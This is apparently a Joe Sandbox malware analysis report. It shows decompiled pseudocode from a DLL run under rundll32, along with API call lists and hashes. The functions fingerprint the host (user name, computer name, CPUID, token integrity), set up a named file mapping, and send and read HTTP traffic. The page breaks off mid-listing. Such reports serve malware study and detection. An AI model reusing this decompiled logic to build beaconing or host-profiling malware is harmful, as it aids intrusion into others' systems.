Opcode Fuzzy Hash: 657b8e351d7594f5ba1c59ab71c0715aa7f0c393bb923b528614c7953fe453e7
Instruction Fuzzy Hash: 60813CB5A007059FDB28DFAAE880AAEB7F5FF48310F148429E505E7340E775E949DB60

Uniqueness

Uniqueness Score: -1.00%

Function 045E60A1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E045E60A1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L045E82A4();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x45ea348; // 0xa0d5a8
				_t5 = _t13 + 0x45eb87a; // 0x4ff8e22
				_t6 = _t13 + 0x45eb594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L045E7F0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x45ea34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x045e60a1
0x045e60a9
0x045e60ad
0x045e60b3
0x045e60b8
0x045e60bd
0x045e60c0
0x045e60c3
0x045e60c8
0x045e60c9
0x045e60cc
0x045e60d1
0x045e60d8
0x045e60e2
0x045e60e4
0x045e60e5
0x045e60e8
0x045e6104
0x045e610a
0x045e610e
0x045e615c
0x045e6110
0x045e611d
0x045e612d
0x045e6135
0x045e6147
0x045e614b
0x00000000
0x00000000
0x045e6137
0x045e613a
0x045e613f
0x045e6141
0x045e6141
0x045e611f
0x045e6121
0x045e614d
0x045e614e
0x045e614e
0x045e611d
0x045e6163

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,045E113B,?,?,4D283A53,?,?), ref: 045E60AD
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 045E60C3
_snwprintf.NTDLL ref: 045E60E8
CreateFileMappingW.KERNELBASE(000000FF,045EA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 045E6104
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,045E113B,?,?,4D283A53,?), ref: 045E6116
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 045E612D
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,045E113B,?,?,4D283A53), ref: 045E614E
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,045E113B,?,?,4D283A53,?), ref: 045E6156

Strings

@MqtNqt, xrefs: 045E6156

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: @MqtNqt
API String ID: 1814172918-2883916605
Opcode ID: 7399bfe451df70a324089564e013a8c9e8b65ccca03639f9b8fedcceb355677b
Instruction ID: 904e5ee5bce138a71243be71412244d491a43ef616858d1d95965642d20dd1ae
Opcode Fuzzy Hash: 7399bfe451df70a324089564e013a8c9e8b65ccca03639f9b8fedcceb355677b
Instruction Fuzzy Hash: 7521A5B2A00204BBD71EDB66DC05FAD77B9FB98750F500021F515EB291E671E905EB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E54EC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E045E54EC(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x45ea310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E045E3B9D( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x45ea344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x45ea2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E045E7194(_v8 + _v8, _t64);
							}
							HeapFree( *0x45ea2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x45ea2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E045E7194(_v8 + _v8, _t64);
						}
						HeapFree( *0x45ea2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x045e54ec
0x045e54f4
0x045e54f8
0x045e54fb
0x045e5500
0x045e5502
0x045e5507
0x045e5507
0x045e550d
0x045e550f
0x045e551c
0x045e557d
0x045e551e
0x045e5523
0x045e5529
0x045e552e
0x045e553c
0x045e5540
0x045e554f
0x045e5556
0x045e555d
0x045e555d
0x045e5568
0x045e5568
0x045e5540
0x045e552e
0x045e557f
0x045e5585
0x045e558f
0x045e5591
0x045e5596
0x045e55a5
0x045e55a9
0x045e55b4
0x045e55bb
0x045e55c2
0x045e55c2
0x045e55ce
0x045e55ce
0x045e55a9
0x045e55d9
0x045e55db
0x045e55de
0x045e55e0
0x045e55e3
0x045e55e6
0x045e55f0
0x045e55f4
0x045e55f8

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 045E5523
RtlAllocateHeap.NTDLL(00000000,?), ref: 045E553A
GetUserNameW.ADVAPI32(00000000,?), ref: 045E5547
HeapFree.KERNEL32(00000000,00000000), ref: 045E5568
GetComputerNameW.KERNEL32(00000000,00000000), ref: 045E558F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 045E55A3
GetComputerNameW.KERNEL32(00000000,00000000), ref: 045E55B0
HeapFree.KERNEL32(00000000,00000000), ref: 045E55CE

Strings

Uqt, xrefs: 045E5568, 045E55CE

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uqt
API String ID: 3239747167-2320327147
Opcode ID: 71729e748d08d0d16a4488c800bdec6901ee06bd9e20dc7ec7e1769a43ea32e7
Instruction ID: dffd05c121d1e369ad1fbfcfacef37b3b6f41963b355a72a469c56b805650042
Opcode Fuzzy Hash: 71729e748d08d0d16a4488c800bdec6901ee06bd9e20dc7ec7e1769a43ea32e7
Instruction Fuzzy Hash: 9E31F8B2A00209AFD718DFBADC80A6EB7FAFF48214F514469E505D7211EB74ED05AB10

Uniqueness

Uniqueness Score: -1.00%

Function 045E4F4B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E045E4F4B(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x45ea174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E045E7A71(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E045E2129( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E045E789E(_v16);
										if(_t64 == 0) {
											_t64 = E045E45DF(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E045E2129( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E045E4E4D(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x045e4f4b
0x045e4f4c
0x045e4f52
0x045e4f5d
0x045e4f5d
0x045e4f5f
0x045e7625
0x045e762a
0x045e762c
0x045e7643
0x045e7674
0x045e7679
0x045e773c
0x045e767f
0x045e7686
0x045e768e
0x045e7739
0x045e7694
0x045e7699
0x045e769e
0x045e76a3
0x045e772b
0x045e76a9
0x045e76a9
0x045e76ab
0x045e76b1
0x045e76b2
0x045e76b2
0x045e76b5
0x045e76b8
0x045e76be
0x045e76cf
0x045e76d7
0x00000000
0x00000000
0x045e76df
0x045e76e7
0x045e76f3
0x045e76f7
0x045e76f9
0x045e76fe
0x00000000
0x00000000
0x045e76fe
0x045e76f7
0x045e7710
0x045e7713
0x045e771a
0x045e7725
0x045e7725
0x00000000
0x045e7700
0x045e7700
0x045e7705
0x045e7707
0x045e7708
0x045e770b
0x00000000
0x045e770b
0x00000000
0x045e7705
0x045e76b2
0x045e772c
0x045e772c
0x045e7732
0x045e7732
0x045e768e
0x045e7645
0x045e764b
0x045e7653
0x045e766c
0x045e766e
0x00000000
0x00000000
0x045e7655
0x045e765f
0x045e7663
0x045e7669
0x00000000
0x045e7669
0x045e7663
0x045e7653
0x045e7745
0x045e4f54
0x045e4f54
0x045e4f5b
0x045e4f66
0x00000000
0x00000000
0x00000000
0x045e4f5b

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,747581D0,00000000,00000000), ref: 045E762C
InternetReadFile.WININET(?,?,00000004,?), ref: 045E763B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?,?), ref: 045E7645
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?), ref: 045E76BE
InternetReadFile.WININET(?,?,00001000,?), ref: 045E76CF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?,?), ref: 045E76D9

Part of subcall function 045E4E4D: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 045E4E64
Part of subcall function 045E4E4D: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?), ref: 045E4E74
Part of subcall function 045E4E4D: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 045E4EA6
Part of subcall function 045E4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 045E4ECB
Part of subcall function 045E4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 045E4EEB

Strings

@MqtNqt, xrefs: 045E7645, 045E76D9

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
String ID: @MqtNqt
API String ID: 2393427839-2883916605
Opcode ID: 2e82f23394972a1dafdd4d1f0094c14957ca89138bccb40f1a2191c720eb3420
Instruction ID: 65351ce095c439b04823bfa91459bd5ed976a70f2d2c41c994ba28ac86df89aa
Opcode Fuzzy Hash: 2e82f23394972a1dafdd4d1f0094c14957ca89138bccb40f1a2191c720eb3420
Instruction Fuzzy Hash: 2741C436600604EBDB29AFA6EC44A7E77BAFF88364F104964E552D7190EB30F941FB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E2C73 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E045E2C73(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E045E452E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E045E7B59(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x045e2c73
0x045e2c80
0x045e2c82
0x045e2ce5
0x00000000
0x045e2ce5
0x045e2c9a
0x045e2ca1
0x045e2cad
0x045e2cb2
0x045e2cc8
0x045e2cd8
0x00000000
0x045e2cca
0x045e2cca
0x045e2cd1
0x045e2cde
0x045e2cde
0x045e2cde
0x045e2cd1
0x045e2cc8
0x045e2ce3
0x00000000
0x00000000
0x045e2ce9

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,045E5D46,?,?,747581D0,00000000), ref: 045E2CAD
ResetEvent.KERNEL32(?), ref: 045E2CB2
HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 045E2CBF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?,?), ref: 045E2CCA
GetLastError.KERNEL32(?,?,00000102,045E5D46,?,?,747581D0,00000000), ref: 045E2CE5

Part of subcall function 045E452E: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,045E2C92,?,?,?,?,00000102,045E5D46,?,?,747581D0), ref: 045E453A
Part of subcall function 045E452E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,045E2C92,?,?,?,?,00000102,045E5D46,?), ref: 045E4598
Part of subcall function 045E452E: lstrcpy.KERNEL32(00000000,00000000), ref: 045E45A8

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?), ref: 045E2CD8

Strings

@MqtNqt, xrefs: 045E2C79

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
String ID: @MqtNqt
API String ID: 3739416942-2883916605
Opcode ID: 7040bd8ac7ade7435344e6a9105902208f93a173218193374d97a30c50313ecf
Instruction ID: a7a2cc40585a192ee479b5fa89e37e99ca0da8ad156da141cbe1ec4056e40e3c
Opcode Fuzzy Hash: 7040bd8ac7ade7435344e6a9105902208f93a173218193374d97a30c50313ecf
Instruction Fuzzy Hash: E1018B75100202BBD7386B23ED48F3B76ADFF88364F200A25F55AA50E0D620F808BA60

Uniqueness

Uniqueness Score: -1.00%

Function 045E70E7 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E045E70E7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E045E2129(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E045E789E(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E045E789E(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E045E789E(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E045E789E(_t46);
				}
				return _t24;
			}

0x045e70e7
0x045e70e7
0x045e70e9
0x045e70eb
0x045e70f2
0x045e70f9
0x045e70f9
0x045e70fe
0x045e7101
0x045e7108
0x045e7111
0x045e7115
0x045e711a
0x045e711a
0x045e711c
0x045e7121
0x045e7125
0x045e712a
0x045e712a
0x045e712c
0x045e7131
0x045e7135
0x045e713a
0x045e713a
0x045e713c
0x045e7147
0x045e714a
0x045e714a
0x045e714c
0x045e7151
0x045e7154
0x045e7154
0x045e7156
0x045e715d
0x045e7160
0x045e7165
0x045e7168
0x045e7168
0x045e716b
0x045e7170
0x045e7173
0x045e7173
0x045e7178
0x045e717c
0x045e717f
0x045e717f
0x045e7184
0x045e7189
0x00000000
0x045e718c
0x045e7193

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 045E7115
InternetCloseHandle.WININET(?), ref: 045E711A
InternetSetStatusCallback.WININET(?,00000000), ref: 045E7125
InternetCloseHandle.WININET(?), ref: 045E712A
InternetSetStatusCallback.WININET(?,00000000), ref: 045E7135
InternetCloseHandle.WININET(?), ref: 045E713A
FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,045E5DA7,?,?,747581D0,00000000,00000000), ref: 045E714A
CloseHandle.KERNEL32(?,00000000,00000102,?,?,045E5DA7,?,?,747581D0,00000000,00000000), ref: 045E7154

Part of subcall function 045E2129: WaitForMultipleObjects.KERNEL32(00000002,045E7C1D,00000000,045E7C1D,?,?,?,045E7C1D,0000EA60), ref: 045E2144

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
String ID:
API String ID: 2172891992-0
Opcode ID: 67f944f9416948c24c7dcbdac7d6454e39ab8a29698a9c2d0b1b11090ec7f9a7
Instruction ID: afd7f3170466eaea7319b9223ec2ec525c455b73fe5e633add799327f399118a
Opcode Fuzzy Hash: 67f944f9416948c24c7dcbdac7d6454e39ab8a29698a9c2d0b1b11090ec7f9a7
Instruction Fuzzy Hash: 0C110A766007496BC638AEABEC84C2BB7EDBB592043650D19E089D3611C726F849AA60

Uniqueness

Uniqueness Score: -1.00%

Function 045E578B Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E045E578B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x45ea2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E045E7A71(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E045E789E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x045e5798
0x045e579f
0x045e57a6
0x045e57ba
0x045e57c5
0x045e57dd
0x045e57ea
0x045e57ed
0x045e57f2
0x045e57fd
0x045e5801
0x045e5810
0x045e5814
0x045e5830
0x045e5830
0x045e5834
0x045e5834
0x045e5839
0x045e583d
0x045e5843
0x045e5844
0x045e584b
0x045e5851

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 045E57BD
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 045E57DD
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 045E57ED
CloseHandle.KERNEL32(00000000), ref: 045E583D

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 045E5810
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 045E5818
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 045E5828

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: b17869b7c109ec92a387a4f99c4dcac962a07bf178e7277ff1739b016524e51b
Instruction ID: 8a10ac704d1771385de1c13d170141ba34714b7b37a13f089b4a99edde20b45d
Opcode Fuzzy Hash: b17869b7c109ec92a387a4f99c4dcac962a07bf178e7277ff1739b016524e51b
Instruction Fuzzy Hash: CE21487590021DFFEB019FA2DC44EFEBBB9FB48308F1000A5EA10A6161D7755E49EB60

Uniqueness

Uniqueness Score: -1.00%

Function 045E2281 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E045E2281(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x45ea348; // 0xa0d5a8
				_t1 = _t9 + 0x45eb624; // 0x253d7325
				_t36 = 0;
				_t28 = E045E6779(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x4ff9601
					_t40 = E045E7A71(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E045E44D8(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E045E789E(_t40);
						_t42 = E045E17F0(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E045E789E(_t36);
							_t36 = _t42;
						}
						_t43 = E045E5454(_t36, _t33);
						if(_t43 != 0) {
							E045E789E(_t36);
							_t36 = _t43;
						}
					}
					E045E789E(_t28);
				}
				return _t36;
			}

0x045e2281
0x045e2284
0x045e2285
0x045e228c
0x045e2293
0x045e229a
0x045e229e
0x045e22a5
0x045e22ac
0x045e22b1
0x045e22b9
0x045e22c3
0x045e22c7
0x045e22cb
0x045e22d1
0x045e22d6
0x045e22e0
0x045e22e6
0x045e22e8
0x045e22ff
0x045e2303
0x045e2306
0x045e230b
0x045e230b
0x045e2314
0x045e2318
0x045e231b
0x045e2320
0x045e2320
0x045e2318
0x045e2323
0x045e2328
0x045e232e

APIs

Part of subcall function 045E6779: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,045E229A,253D7325,00000000,00000000,?,775EC740,045E3831), ref: 045E67E0
Part of subcall function 045E6779: sprintf.NTDLL ref: 045E6801

